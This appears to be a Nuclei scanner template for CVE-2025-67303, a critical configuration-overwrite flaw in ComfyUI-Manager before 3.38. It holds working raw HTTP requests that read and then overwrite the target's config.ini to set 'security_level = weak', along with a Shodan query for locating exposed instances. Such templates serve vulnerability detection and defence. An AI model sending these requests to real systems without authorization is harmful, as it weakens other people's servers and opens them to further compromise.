id: CVE-2025-67303 info: name: ComfyUI-Manager < 3.38 - Configuration Overwrite author: maciejklimek severity: critical description: | ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access. impact: | Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security. remediation: | Update to version 3.38 or later. reference: - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-67303 epss-score: 0.01551 epss-percentile: 0.81737 cwe-id: CWE-420 metadata: verified: true max-request: 3 vendor: comfy-org product: comfyui-manager shodan-query: http.title:"ComfyUI" tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev http: - raw: - | GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1 Host: {{Hostname}} - | POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1 Host: {{Hostname}} Content-Type: application/octet-stream [default] security_level = weak - | GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains_all(body_1, '[default]', 'security_level')" - "contains(body_3, 'security_level = weak')" - "status_code_1 == 200 && status_code_3 == 200" condition: and # digest: 490a0046304402206282bbc97e1e36324c2186cc9b53dcc4a38c2ed7b57865ecb241068d7e40d185022069fe10db6790dbc33423279fb4e6233aaaf99f0c3119bc74d77cddac7ec484a6:922c64590222798bb761d5b6d8e72950